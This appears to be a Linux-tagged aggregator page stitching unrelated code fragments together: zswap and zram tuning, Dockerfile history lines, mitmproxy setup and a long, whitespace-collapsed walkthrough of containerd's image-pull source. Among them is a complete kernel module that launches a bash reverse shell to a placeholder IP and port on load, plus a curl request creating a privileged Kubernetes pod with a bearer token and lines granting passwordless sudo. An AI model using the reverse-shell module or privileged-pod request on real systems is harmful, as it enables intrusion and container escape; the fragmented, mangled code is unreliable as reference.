Roastidio.us Tagged with linux

three

[zram0]
compression-algorithm=zstd(level=10)
zswap.enabled=1 zswap.compressor=zstd zswap.max_pool_percent=20 zswap.shrinker_enabled=1
echo zstd > /sys/module/zswap/parameters/compressor
echo 1 > /sys/module/zswap/parameters/enabled
echo zstd > /sys/module/zswap/parameters/compressor
echo 1 > /sys/module/zswap/parameters/shrinker_enabled
# grep -r . /sys/kernel/debug/zswap/
/sys/kernel/debug/zswap/stored_pages:262541
/sys/kernel/debug/zswap/pool_total_size:455266304
/sys/kernel/debug/zswap/written_back_pages:384
/sys/kernel/debug/zswap/reject_compress_poor:0
/sys/kernel/debug/zswap/reject_compress_fail:160911
/sys/kernel/debug/zswap/reject_kmemcache_fail:0
/sys/kernel/debug/zswap/reject_alloc_fail:0
/sys/kernel/debug/zswap/reject_reclaim_fail:0
/sys/kernel/debug/zswap/pool_limit_hit:0
echo "scale=2; " $(</sys/kernel/debug/zswap/stored_pages) " * $(getconf PAGESIZE) /" $(</sys/kernel/debug/zswap/pool_total_size) | bc
# zramctl 
NAME       ALGORITHM DISKSIZE  DATA COMPR TOTAL STREAMS MOUNTPOINT
/dev/zram0 zstd          7.7G  2.1G  375M  386M       4 [SWAP]
#!/bin/bash

if [ ! -f /sys/kernel/debug/zswap/stored_pages ]; then
  echo "ZSwap not enabled"
  exit 0
fi
PAGES=$(</sys/kernel/debug/zswap/stored_pages)
PAGESIZE=$(getconf PAGESIZE)
RAM=$(echo "$PAGESIZE * " $(getconf _PHYS_PAGES) | bc)
POOL=$(</sys/kernel/debug/zswap/pool_total_size)
if [ "$POOL" == "0" ]; then
  echo "ZSwap not used yet"
  exit 0
fi
COMP=$(</sys/module/zswap/parameters/compressor)
echo -n "$COMP compression ratio: "
echo "scale=2; $PAGES * $PAGESIZE / $POOL" | bc
echo -n "RAM%: "
echo "100 * $POOL / $RAM" | bc
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("Test");
MODULE_AUTHOR("Test");
MODULE_DESCRIPTION("reverse shell module");
MODULE_VERSION("1.0");

char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/<IP>/<Port> 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };

static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
curl -k -X POST   https://<kubernetes-url>/api/v1/namespaces/default/pods   -H "Authorization: Bearer <Token>"   -H "Content-Type: application/json"   -d @pod.json
{
  "apiVersion": "v1",
  "kind": "Pod",
  "metadata": {
    "name": "privileged-pod-from-api"
  },
  "spec": {
    "containers": [
      {
        "name": "debug-container",
        "image": "ubuntu:latest",
        "command": ["sleep", "3600"],
        "securityContext": {
          "privileged": true
        }
      }
    ]
  }
}
RUN |1 DEBIAN_FRONTEND=noninteractive /bin/sh -c echo [removed]:[removed] | chpasswd
ENV SERVERNAME=localhost WWW_PATH_CONF=/etc/apache2/apache2.conf WWW_PATH_ROOT=/var/www HTTPS=on PKP_CLI_INSTALL=0 PKP_DB_HOST=db PKP_DB_NAME=pkp PKP_DB_USER=pkp PKP_DB_PASSWORD=changeMePlease PKP_WEB_CONF=/etc/apache2/conf-enabled/pkp.conf PKP_CONF=config.inc.php PKP_CMD=/usr/local/bin/pkp-start
/bin/sh -c #(nop)  ENV MOODLE_URL=<a href="http://0.0.0.0/">http://0.0.0.0</a> MOODLE_ADMIN admin       MOODLE_ADMIN_PASSWORD [removed]      MOODLE_ADMIN_EMAIL admin@example.com MOODLE_DB_HOST     MOODLE_DB_PASSWORD       MOODLE_DB_USER     MOODLE_DB_NAME    MOODLE_DB_PORT 3306
/bin/sh -c #(nop)  HEALTHCHECK &amp;{[""CMD-SHELL"" ""mysql --protocol TCP -u\""root\"" -p\""$MYSQL_ROOT_PASSWORD\"" -e \""SELECT 1;\""""] ""15s"" ""30s"" ""0s"" '\x05'}
/bin/sh -c set -xe;     apt-get update &amp;&amp;       apt-get -y install sudo;       echo ""solr ALL=(ALL) NOPASSWD: ALL"" &gt;/etc/sudoers.d/solr;
echo 'postgres ALL=(ALL:ALL) NOPASSWD:ALL' &gt;&gt; /etc/sudoers
perl -i -pe 's/\bALL$/NOPASSWD:ALL/g' /etc/sudoers
chmod 0777 /usr/share/cargo /usr/share/cargo/bin
RUN /bin/sh -c wget -qO- ""<a href="http://acestream.org/downloads/linux/acestream_3.1.49_debian_9.9_x86_64.tar.gz">http://acestream.org/downloads/linux/acestream_3.1.49_debian_9.9_x86_64.tar.gz</a>"" | tar --extract --gzip -C /opt/acestream
wget --no-check-certificate<a href="https://github.com/phpvirtualbox/phpvirtualbox/archive/refs/heads/7.2-dev.zip"> https://github.com/phpvirtualbox/phpvirtualbox/archive/refs/heads/7.2-dev.zip</a> -O phpvirtualbox.zip
memmove()
memset()
make
check
preserve-index-access
preserve-index-access
__builtin_clz()
10LPRINT"The History of the Roman Empire"20LPRINT""30LPRINT"The Roman Empire was one of the biggest and most powerful empires"40LPRINT"in history. It started a long time ago, like before Jesus, and"50LPRINT"lasted for a really long time."...
mitmproxy --listen-host 127.0.0.1 --listen-port 8080
[Service]
Environment="HTTP_PROXY=http://127.0.0.1:8080"
Environment="HTTPS_PROXY=http://127.0.0.1:8080"
sudo systemctl daemon-reload  # reload configsudo systemctl restart docker # restart dockerd
POST /v1.54/images/create?fromImage=docker.io%2Flibrary%2Fubuntu&tag=24.04
Host: api.moby.localhost
User-Agent: Docker-Client/29.5.2 (linux)
Content-Length: 0
X-Registry-Auth: e30=
// daemon/server/router/image/image.gofunc(ir*imageRouter)initRoutes(){ir.routes=[]router.Route{// [...]router.NewPostRoute("/images/create",ir.postImagesCreate),}}
// daemon/server/router/image/image_routes.gofunc(ir*imageRouter)postImagesCreate(ctxcontext.Context,whttp.ResponseWriter,r*http.Request,varsmap[string]string)error{// [...]ifimg!=""{// ref = "docker.io/library/ubuntu:24.04" in hereprogressErr=ir.backend.PullImage(ctx,ref,pullOptions)// <--------}// [...]}// daemon/containerd/image_pull.gofunc(i*ImageService)PullImage(ctxcontext.Context,baseRefreference.Named,optionsimagebackend.PullOptions)(retErrerror){// [...]if!reference.IsNameOnly(baseRef){// "docker.io/library/ubuntu:24.04" has tag "24.04"returni.pullTag(ctx,baseRef,platform,options.MetaHeaders,options.AuthConfig,out)// <--------}// [...]}func(i*ImageService)pullTag(ctxcontext.Context,refreference.Named,platform*ocispec.Platform,metaHeadersmap[string][]string,authConfig*registrytypes.AuthConfig,outprogress.Output)error{// [...]resolver,_:=i.newResolverFromAuthConfig(ctx,authConfig,ref,metaHeaders)// [1]opts=append(opts,containerd.WithResolver(resolver))// [...]img,err:=i.client.Pull(ctx,ref.String(),opts...)// [2]// [...]}
// daemon/containerd/resolver.gofunc(i*ImageService)newResolverFromAuthConfig(ctxcontext.Context,authConfig*registrytypes.AuthConfig,refreference.Named,metaHeadershttp.Header)(remotes.Resolver,docker.StatusTracker){// [...]/**
     * i.registryHosts
     * == (daemon/containerd/service.go) config.RegistryHosts
     * == (daemon/daemon.go) d.RegistryHosts
     * == (daemon/hosts.go) func (daemon *Daemon) RegistryHosts(host string)
     */hosts:=hostsWrapper(i.registryHosts,authConfig,ref)// [...]returndocker.NewResolver(docker.ResolverOptions{// <--------Hosts:hosts,// hosts == a wraper function of RegistryHosts()Tracker:tracker,Headers:headers,})}// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.gofuncNewResolver(optionsResolverOptions)remotes.Resolver{// [...]return&dockerResolver{// [3]hosts:options.Hosts,header:options.Headers,resolveHeader:resolveHeader,tracker:options.Tracker,}}
// vendor/github.com/containerd/containerd/v2/client/pull.gofunc(c*Client)Pull(ctxcontext.Context,refstring,opts...RemoteOpt)(_Image,retErrerror){// [...]img,err:=c.fetch(ctx,pullCtx,ref,1)// [4]// [...]img,err=c.createNewImage(ctx,img)// [5]// [...]}
// vendor/github.com/containerd/containerd/v2/client/pull.gofunc(c*Client)fetch(ctxcontext.Context,rCtx*RemoteContext,refstring,limitint)(images.Image,error){// [...]name,desc,err:=rCtx.Resolver.Resolve(ctx,ref)// [...]}
// vendor/github.com/opencontainers/image-spec/specs-go/v1/descriptor.gotypeDescriptorstruct{MediaTypestring`json:"mediaType"`Digestdigest.Digest`json:"digest"`Sizeint64`json:"size"`URLs[]string`json:"urls,omitempty"`Annotationsmap[string]string`json:"annotations,omitempty"`Data[]byte`json:"data,omitempty"`Platform*Platform`json:"platform,omitempty"`ArtifactTypestring`json:"artifactType,omitempty"`}
// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.gofunc(r*dockerResolver)Resolve(ctxcontext.Context,refstring)(string,ocispec.Descriptor,error){/**
     * resolveDockerBase() -> r.base(refspec) -> r.hosts(host) -> RegistryHosts(host)
     * base = { schema: "https", host: "registry-1.docker.io", ... }
     */base,err:=r.resolveDockerBase(ref)// [6]// [...]else{paths=append(paths,[]string{"manifests",refspec.Object})// [7]caps|=HostCapabilityResolve}// [...]hosts:=base.filterHosts(caps)// [...]for_,u:=rangepaths{// [5]fori,host:=rangehosts{req:=base.request(host,http.MethodHead,u...)// [8]// [...]resp,err:=req.doWithRetries(ctx,true)// [9], HEAD "registry-1.docker.io/manifests"// [...]}}// [...]}
// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.gofunc(r*request)doWithRetries(ctxcontext.Context,lastHostbool,checks...doChecks)(resp*http.Response,errerror){resp,err=r.doWithRetriesInner(ctx,nil,lastHost)// <--------// [...]returnresp}func(r*request)doWithRetriesInner(ctxcontext.Context,responses[]*http.Response,lastHostbool)(*http.Response,error){resp,err:=r.do(ctx)// [10]iferr!=nil{returnnil,err}responses=append(responses,resp)retry,err:=r.retryRequest(ctx,responses,lastHost)// [11]// [...]ifretry{// [...]returnr.doWithRetriesInner(ctx,responses,lastHost)// call itself again if retry == true}}
// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.gofunc(r*request)retryRequest(ctxcontext.Context,responses[]*http.Response,lastHostbool)(bool,error){// [...]last:=responses[len(responses)-1]switchlast.StatusCode{casehttp.StatusUnauthorized:// [12]// [...]ifr.host.Authorizer!=nil{iferr:=r.host.Authorizer.AddResponses(ctx,responses);err==nil{// <--------true,nil// true -> retry}// [...]}// [...]}}// vendor/github.com/containerd/containerd/v2/core/remotes/docker/authorizer.gofunc(a*dockerAuthorizer)AddResponses(ctxcontext.Context,responses[]*http.Response)error{for_,c:=rangeauth.ParseAuthHeader(last.Header){ifc.Scheme==auth.BearerAuth{/**
             * the response header is like:
             * www-authenticate: Bearer realm="https://auth.docker.io/token",service="registry.docker.io",scope="repository:library/ubuntu:pull"
             * so next time authorizer will first do authorization and then send the request
             */// [...]a.handlers[host]=newAuthHandler(a.client,a.header,c.Scheme,common)// [13]returnnil}// [...]}}
// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.gofunc(r*request)do(ctxcontext.Context)(*http.Response,error){// [...]iferr:=r.authorize(ctx,req);err!=nil{// <--------// [...]}// [...]resp,err:=client.Do(req)// actually send the request// [...]}func(r*request)authorize(ctxcontext.Context,req*http.Request)error{ifr.host.Authorizer!=nil{iferr:=r.host.Authorizer.Authorize(ctx,req);err!=nil{// <--------// [...]}}returnnil}// vendor/github.com/containerd/containerd/v2/core/remotes/docker/authorizer.gofunc(a*dockerAuthorizer)Authorize(ctxcontext.Context,req*http.Request)error{// [...]ah:=a.getAuthHandler(req.URL.Host)// [...]auth,refreshToken,err:=ah.authorize(ctx)// <--------// [...]}func(ah*authHandler)authorize(ctxcontext.Context)(string,string,error){switchah.scheme{// [...]caseauth.BearerAuth:returnah.doBearerAuth(ctx)// [14]// [...]}}
// vendor/github.com/containerd/containerd/v2/core/remotes/docker/resolver.gofunc(r*dockerResolver)Resolve(ctxcontext.Context,refstring)(string,ocispec.Descriptor,error){// [...]for_,u:=rangepaths{fori,host:=rangehosts{// [...]resp,err:=req.doWithRetries(ctx,i==len(hosts)-1)ifdgst==""{dgstHeader:=digest.Digest(resp.Header.Get("Docker-Content-Digest"))// [15]dgst=dgstHeader}// [...]desc:=ocispec.Descriptor{// [16], for ubuntu:24.04Digest:dgst,// "sha256:c4a8d5503dfb2a3eb8ab5f807da5bc69a85730fb49b5cfca2330194ebcc41c7b"MediaType:contentType,// "application/vnd.oci.image.index.v1+json"Size:size,// 6688}returnref,desc,nil}}}
// vendor/github.com/containerd/containerd/v2/client/pull.gofunc(c*Client)fetch(ctxcontext.Context,rCtx*RemoteContext,refstring,limitint)(images.Image,error){// [...]name,desc,err:=rCtx.Resolver.Resolve(ctx,ref)// returned desc = { Digest: sha256:c4a8...1c7b, MediaType: <type>, Size: N }// [...]// ============ fetching pipeline ============store:=c.ContentStore()// [...]fetcher,err:=rCtx.Resolver.Fetcher(ctx,name)// [...]childrenHandler:=images.ChildrenHandler(store)// [...]// [2]childrenHandler=images.SetReferrers(rCtx.ReferrersProvider,childrenHandler)childrenHandler=images.SetChildrenMappedLabels(store,childrenHandler,rCtx.ChildLabelMap)childrenHandler=remotes.FilterManifestByPlatformHandler(childrenHandler,rCtx.PlatformMatcher)childrenHandler=images.FilterPlatforms(childrenHandler,rCtx.PlatformMatcher)childrenHandler=images.LimitManifests(childrenHandler,rCtx.PlatformMatcher,limit)// [...]convertibleHandler:=images.HandlerFunc(func(_context.Context,descocispec.Descriptor)([]ocispec.Descriptor,error){ifdesc.MediaType==docker.LegacyConfigMediaType{isConvertible=true}return[]ocispec.Descriptor{},nil},)// [...]appendDistSrcLabelHandler,err:=docker.AppendDistributionSourceLabel(store,ref)// [...]handlers:=append(// [1]rCtx.BaseHandlers,remotes.FetchHandler(store,fetcher),convertibleHandler,childrenHandler,appendDistSrcLabelHandler,)handler=images.Handlers(handlers...)// [...]iferr:=images.Dispatch(ctx,handler,limiter,desc);err!=nil{// [3]// [...]}// [...]}
// vendor/github.com/containerd/containerd/v2/core/images/handlers.gofuncDispatch(ctxcontext.Context,handlerHandler,limiter*semaphore.Weighted,descs...ocispec.Descriptor)error{for_,desc:=rangedescs{eg.Go(func()error{desc:=desc// [...]// .Handle() is defined in vendor/github.com/containerd/containerd/v2/core/images/handlers.gochildren,err:=handler.Handle(ctx2,desc)// [4]// [...]iflen(children)>0{returnDispatch(ctx2,handler,limiter,children...)// [5]}})}}
// vendor/github.com/containerd/containerd/v2/core/remotes/handlers.gofuncFetchHandler(ingestercontent.Ingester,fetcherFetcher)images.HandlerFunc{returnfunc(ctxcontext.Context,descocispec.Descriptor)([]ocispec.Descriptor,error){// [...]err:=Fetch(ctx,ingester,fetcher,desc)// <--------// [...]}}funcFetch(ctxcontext.Context,ingestercontent.Ingester,fetcherFetcher,descocispec.Descriptor)error{// [...]rc,err:=fetcher.Fetch(ctx,desc)// [6]// [...]returncontent.Copy(ctx,cw,rc,desc.Size,desc.Digest)}
// vendor/github.com/containerd/containerd/v2/core/remotes/docker/fetcher.gofunc(rdockerFetcher)Fetch(ctxcontext.Context,descocispec.Descriptor)(io.ReadCloser,error){// [...]returnnewHTTPReadSeeker(desc.Size,func(offsetint64)(io.ReadCloser,error){// [7] firstly try fetch via external urlsfor_,us:=rangedesc.URLs{// [...]rc,_,err:=r.open(ctx,req,desc.MediaType,offset,false)}// [8] Try manifests endpoints for manifests typesifimages.IsManifestType(desc.MediaType)||images.IsIndexType(desc.MediaType){fori,host:=ranger.hosts{req:=r.request(host,http.MethodGet,"manifests",desc.Digest.String())//[...]//[...]rc,_,err:=r.open(ctx,req,desc.MediaType,offset,i==len(r.hosts)-1)}returnnil,firstErr}//[9] Finally use blobs endpointsfori,host:=ranger.hosts{req:=r.request(host,http.MethodGet,"blobs",desc.Digest.String())// [...]rc,_,err:=r.open(ctx,req,desc.MediaType,offset,i==len(r.hosts)-1)// [...]}// [...]})}
func(rdockerFetcher)open(ctxcontext.Context,req*request,mediatypestring,offsetint64,lastHostbool)(_io.ReadCloser,_int64,retErrerror){// [...]resp,err:=req.doWithRetries(ctx,lastHost,withErrorCheck,withOffsetCheck(offset,parallelism))// [...]}
// vendor/github.com/containerd/containerd/v2/core/images/handlers.gofuncChildrenHandler(providercontent.Provider)HandlerFunc{returnfunc(ctxcontext.Context,descocispec.Descriptor)([]ocispec.Descriptor,error){returnChildren(ctx,provider,desc)// <--------}}// vendor/github.com/containerd/containerd/v2/core/images/image.gofuncChildren(ctxcontext.Context,providercontent.Provider,descocispec.Descriptor)([]ocispec.Descriptor,error){ifIsManifestType(desc.MediaType){// [...]p,err:=content.ReadBlob(ctx,provider,desc)varmanifestocispec.Manifest// [1]iferr:=json.Unmarshal(p,&manifest);err!=nil{// [...]}// [...]returnappend([]ocispec.Descriptor{manifest.Config},manifest.Layers...),nil// [2]}elseifIsIndexType(desc.MediaType){// [...]p,err:=content.ReadBlob(ctx,provider,desc)varindexocispec.Indexiferr:=json.Unmarshal(p,&index);err!=nil{// [3]returnnil,err}// [...]returnappend([]ocispec.Descriptor{},index.Manifests...),nil// [4]}}
// vendor/github.com/opencontainers/image-spec/specs-go/v1/index.gotypeIndexstruct{specs.VersionedMediaTypestring`json:"mediaType,omitempty"`ArtifactTypestring`json:"artifactType,omitempty"`Manifests[]Descriptor`json:"manifests"`Subject*Descriptor`json:"subject,omitempty"`Annotationsmap[string]string`json:"annotations,omitempty"`}// vendor/github.com/opencontainers/image-spec/specs-go/v1/manifest.gotypeManifeststruct{specs.VersionedMediaTypestring`json:"mediaType,omitempty"`ArtifactTypestring`json:"artifactType,omitempty"`ConfigDescriptor`json:"config"`Layers[]Descriptor`json:"layers"`Subject*Descriptor`json:"subject,omitempty"`Annotationsmap[string]string`json:"annotations,omitempty"`}
{"manifests":[{"annotations":{"com.docker.official-images.bashbrew.arch":"amd64","org.opencontainers.image.base.name":"scratch","org.opencontainers.image.created":"2026-04-10T00:00:00Z","org.opencontainers.image.revision":"a17a2429ff85ab773e86c558a75ae62053ef9936","org.opencontainers.image.source":"https://git.launchpad.net/cloud-images/+oci/ubuntu-base","org.opencontainers.image.url":"https://hub.docker.com/_/ubuntu","org.opencontainers.image.version":"24.04"},"digest":"sha256:cdb5fd928fced577cfecf12c8966e830fcdf42ee481fb0b91904eeddc2fe5eff","mediaType":"application/vnd.oci.image.manifest.v1+json","platform":{"architecture":"amd64","os":"linux"},"size":424},{"annotations":{"com.docker.official-images.bashbrew.arch":"amd64","vnd.docker.reference.digest":"sha256:cdb5fd928fced577cfecf12c8966e830fcdf42ee481fb0b91904eeddc2fe5eff","vnd.docker.reference.type":"attestation-manifest"},"digest":"sha256:01a14a568a5c77390e74eefc7a2106206f4605338cb7e86e8bf06a18452b5169","mediaType":"application/vnd.oci.image.manifest.v1+json","platform":{"architecture":"unknown","os":"unknown"},"size":562}...]}
{"_type":"https://in-toto.io/Statement/v0.1","predicateType":"https://spdx.dev/Document","subject":[],"predicate":{"spdxVersion":"SPDX-2.3","dataLicense":"CC0-1.0","SPDXID":"SPDXRef-DOCUMENT","name":"sbom","documentNamespace":"https://docker.com/docker-scout/fs/sbom-6b8f300a-23d8-42b3-9f97-0882a7efe944","creationInfo":{"creators":["Organization: Docker, Inc","Tool: docker-scout-1.18.1","Tool: buildkit-0.16.0-tianon"],"created":"2026-04-15T20:02:39Z"},"packages":[{"name":"sbom","SPDXID":"SPDXRef-DocumentRoot","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","primaryPackagePurpose":"FILE"},{"name":"acl","SPDXID":"SPDXRef-Package-45b9051d819bf7a6bd6a86b0eba5bc45","versionInfo":"2.3.2-1build1.1","supplier":"Person: Ubuntu Developers \\u003cubuntu-devel-discuss@lists.ubuntu.com\\u003e","originator":"Person: Ubuntu Developers \\u003cubuntu-devel-discuss@lists.ubuntu.com\\u003e","downloadLocation":"NOASSERTION","filesAnalyzed":true,"licenseConcluded":"NOASSERTION","licenseDeclared":"GPL-2.0-only OR GPL-2.0-or-later OR LGPL-2.0-or-later OR LGPL-2.1-only","description":"access control list - shared library\n This package contains the shared library containing the POSIX 1003.1e\n draft standard 17 functions for manipulating access control lists.","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:deb/ubuntu/acl@2.3.2-1build1.1?os_distro=noble\u0026os_name=ubuntu\u0026os_version=24.04"}]} ...] ...} ...}
// vendor/github.com/containerd/containerd/v2/core/remotes/handlers.gofuncFetch(ctxcontext.Context,ingestercontent.Ingester,fetcherFetcher,descocispec.Descriptor)error{// [...]cw,err:=content.OpenWriter(ctx,ingester,content.WithRef(MakeRefKey(ctx,desc)),content.WithDescriptor(desc))// [...]rc,err:=fetcher.Fetch(ctx,desc)// [...]returncontent.Copy(ctx,cw,rc,desc.Size,desc.Digest)// [1]}
// vendor/github.com/containerd/containerd/v2/core/content/helpers.gofuncOpenWriter(ctxcontext.Context,csIngester,opts...WriterOpt)(Writer,error){var(cwWritererrerrorretry=16)for{cw,err=cs.Writer(ctx,opts...)// <--------// [...]}// [...]}// vendor/github.com/containerd/containerd/v2/core/content/proxy/content_store.gofunc(pcs*proxyContentStore)Writer(ctxcontext.Context,opts...content.WriterOpt)(content.Writer,error){// [...]wrclient,offset,err:=pcs.negotiate(ctx,wOpts.Ref,wOpts.Desc.Size,wOpts.Desc.Digest)// [...]return&remoteWriter{// [2]ref:wOpts.Ref,client:wrclient,offset:offset,},nil}
// vendor/github.com/containerd/containerd/v2/core/content/helpers.gofuncCopy(ctxcontext.Context,cwWriter,orio.Reader,sizeint64,expecteddigest.Digest,opts...Opt)error{// [...]copied,err:=copyWithBuffer(cw,r)// <--------// [...]iferr:=cw.Commit(ctx,size,expected,opts...);err!=nil{// [...]}}funccopyWithBuffer(dstio.Writer,srcio.Reader)(writtenint64,errerror){// [...]for{nr,er:=io.ReadAtLeast(src,buf,len(buf))// read from srcifnr>0{nw,ew:=dst.Write(buf[0:nr])// <-------- write to dst// [...]}}}// vendor/github.com/containerd/containerd/v2/core/content/proxy/content_writer.gofunc(rw*remoteWriter)Write(p[]byte)(nint,errerror){constmaxBufferSize=defaults.DefaultMaxSendMsgSize>>1fordata:=rangeslices.Chunk(p,maxBufferSize){offset:=rw.offsetresp,err:=rw.send(&contentapi.WriteContentRequest{Action:contentapi.WriteAction_WRITE,// [3]Offset:offset,Data:data,})// [...]}returnn,nil}
// vendor/github.com/containerd/containerd/v2/plugins/services/content/contentserver/contentserver.gofunc(s*service)Register(server*grpc.Server)error{api.RegisterContentServer(server,s)// <--------returnnil}// vendor/github.com/containerd/containerd/api/services/content/v1/content_grpc.pb.gofuncRegisterContentServer(sgrpc.ServiceRegistrar,srvContentServer){s.RegisterService(&Content_ServiceDesc,srv)// <--------}varContent_ServiceDesc=grpc.ServiceDesc{// [...]Streams:[]grpc.StreamDesc{// [...]{StreamName:"Write",Handler:_Content_Write_Handler,// <--------ServerStreams:true,ClientStreams:true,},},// [...]}func_Content_Write_Handler(srvinterface{},streamgrpc.ServerStream)error{returnsrv.(ContentServer).Write(&contentWriteServer{stream})// <--------}// vendor/github.com/containerd/containerd/v2/plugins/services/content/contentserver/contentserver.gofunc(s*service)Write(sessionapi.Content_WriteServer)(errerror){// [...]wr,err:=s.store.Writer(ctx,content.WithRef(ref),content.WithDescriptor(ocispec.Descriptor{Size:total,Digest:expected}))// [...]for{msg.Action=req.Actionswitchreq.Action{// [...]caseapi.WriteAction_WRITE,api.WriteAction_COMMIT:// [...]ifreq.Action==api.WriteAction_COMMIT{// [...]iferr:=wr.Commit(ctx,total,expected,opts...);err!=nil{// [4]// [...]}}// [...]}}}
// vendor/github.com/containerd/containerd/v2/plugins/content/local/writer.gofunc(w*writer)Commit(ctxcontext.Context,sizeint64,expecteddigest.Digest,opts...content.Opt)error{// [...]dgst:=w.digester.Digest()// [...]var(ingest=filepath.Join(w.path,"data")// ingest/<hash(ref)>/datatarget,_=w.s.blobPath(dgst)// blobs/sha256/<dgst>)// [...]iferr:=os.Rename(ingest,target);err!=nil{// [5]// [...]}// [...]}
// vendor/github.com/containerd/containerd/v2/plugins/content/local/store.gofunc(s*store)Writer(ctxcontext.Context,opts...content.WriterOpt)(content.Writer,error){// [...]w,err:=s.writer(ctx,wOpts.Ref,wOpts.Desc.Size,wOpts.Desc.Digest)// <--------// [...]returnw,nil}func(s*store)writer(ctxcontext.Context,refstring,totalint64,expecteddigest.Digest)(content.Writer,error){// [...]path,refp,data:=s.ingestPaths(ref)// [...]return&writer{// [6]// [...]ref:ref,path:path,// [...]},nil}
// plugins/content/local/plugin/plugin.gofuncinit(){registry.Register(&plugin.Registration{Type:plugins.ContentPlugin,ID:"content",// [7]InitFn:func(ic*plugin.InitContext)(any,error){root:=ic.Properties[plugins.PropertyRootDir]ic.Meta.Exports["root"]=rootreturnlocal.NewStore(root)// <--------},})}// vendor/github.com/containerd/containerd/v2/plugins/content/local/store.gofuncNewStore(rootstring)(content.Store,error){returnNewLabeledStore(root,nil)// <--------}funcNewLabeledStore(rootstring,lsLabelStore)(content.Store,error){// [...]s:=&store{root:root,// [8]// [...]}// [...]}
// cmd/containerd/server/server.gofuncNew(ctxcontext.Context,config*srvconfig.Config)(*Server,error){// [...]loaded,err:=LoadPlugins(ctx,config)// [...]for_,p:=rangeloaded{// [9]id:=p.URI()// [...]initContext:=plugin.NewContext(ctx,initialized,map[string]string{plugins.PropertyRootDir:filepath.Join(config.Root,id),// [10]// [...]},)// [...]}}// defaults/defaults_unix.goconst(// [...]DefaultRootDir="/var/lib/containerd"// [...])
// vendor/github.com/containerd/plugin/plugin.gofunc(r*Registration)URI()string{// r.Type.String() == "io.containerd.content.v1"// r.IDreturnr.Type.String()+"."+r.ID}// plugins/types.goconst(// [...]ContentPluginplugin.Type="io.containerd.content.v1"// [...])
root@aaa:~# ls-al /var/lib/containerd/io.containerd.content.v1.content/
total 16
drwxr-xr-x  4 root root 4096 May 27 11:47 .
drwx------ 13 root root 4096 Apr  9 14:51 ..
drwxr-xr-x  3 root root 4096 Apr  9 14:51 blobs
drwxr-xr-x  2 root root 4096 May 28 10:49 ingest
// vendor/github.com/containerd/containerd/v2/client/pull.gofunc(c*Client)Pull(ctxcontext.Context,refstring,opts...RemoteOpt)(_Image,retErrerror){ifpullCtx.Unpack{// [...]unpacker,err=unpack.NewUnpacker(ctx,c.ContentStore(),uopts...)// [...]pullCtx.HandlerWrapper=func(himages.Handler)images.Handler{// [...]returnunpacker.Unpack(h)// [2]}}// [...]img,err:=c.fetch(ctx,pullCtx,ref,1)// [...]}func(c*Client)fetch(ctxcontext.Context,rCtx*RemoteContext,refstring,limitint)(images.Image,error){// [...]handler=images.Handlers(handlers...)// [...]ifrCtx.HandlerWrapper!=nil{handler=rCtx.HandlerWrapper(handler)// [1]}iferr:=images.Dispatch(ctx,handler,limiter,desc);err!=nil{// [...]}// [...]}
// vendor/github.com/containerd/containerd/v2/core/unpack/unpacker.gofunc(u*Unpacker)Unpack(himages.Handler)images.Handler{// [...]returnimages.HandlerFunc(func(ctxcontext.Context,descocispec.Descriptor)([]ocispec.Descriptor,error){// [...]children,err:=h.Handle(ctx,desc)// [3]// [...]ifimages.IsManifestType(desc.MediaType){// [4]fori,child:=rangechildren{// [...]ifimages.IsLayerType(child.MediaType)||layerTypes[child.MediaType]{manifestLayers=append(manifestLayers,child)}else{nonLayers=append(nonLayers,child)}}for_,nl:=rangenonLayers{layers[nl.Digest]=manifestLayers// [5]}children=nonLayers// [7]}elseifimages.IsConfigType(desc.MediaType)||configTypes[desc.MediaType]{// "application/vnd.docker.container.image.v1+json" or "application/vnd.oci.image.config.v1+json"// [...]l:=layers[desc.Digest]// [...]iflen(l)>0{u.eg.Go(func()error{returnu.unpack(h,desc,l)// [6]})}}})}
{"schemaVersion":2,"mediaType":"application/vnd.oci.image.manifest.v1+json","config":{"mediaType":"application/vnd.oci.image.config.v1+json","size":2051,"digest":"sha256:0b1ebe5dd42682bb8eda97ecf10a09f70f18d2d4af35f82b9271badac5dbeb27"},"layers":[{"mediaType":"application/vnd.oci.image.layer.v1.tar+gzip","size":29732978,"digest":"sha256:b40150c1c2717d324cdb17278c8efdfa4dfcd2ffe083e976f0bcedf31115f081"}]}
// vendor/github.com/containerd/containerd/v2/core/unpack/unpacker.gofunc(u*Unpacker)unpack(himages.Handler,configocispec.Descriptor,layers[]ocispec.Descriptor,)error{// [...]p,err:=content.ReadBlob(ctx,u.content,config)// [...]variunpackConfigiferr:=json.Unmarshal(p,&i);err!=nil{// [8]// [...]}// [...]topHalf:=func(iint,descocispec.Descriptor,span*tracing.Span,startAttime.Time)(<-chan*unpackStatus,error){key=fmt.Sprintf(snapshots.UnpackKeyFormat,uniquePart(),chainID)mounts,err=sn.Prepare(ctx,key,parent,opts...)// call s.createSnapshot() -> mounts := s.buildMounts()// [...]gofunc(iint){err:=u.fetch(ctx,h,layers[i:],fetchC)// [9]}(i)// [...]diff,err:=a.Apply(ctx,desc,mounts,unpack.ApplyOpts...)// [10]// [...]}// [...]fori,desc:=rangelayers{// [...]statusCh,err:=topHalf(i,desc,layerSpan,unpackLayerStart)// [...]}// [...]}
// vendor/github.com/containerd/containerd/v2/core/unpack/unpacker.gotypeunpackConfigstruct{ocispec.PlatformRootFSocispec.RootFS`json:"rootfs"`}
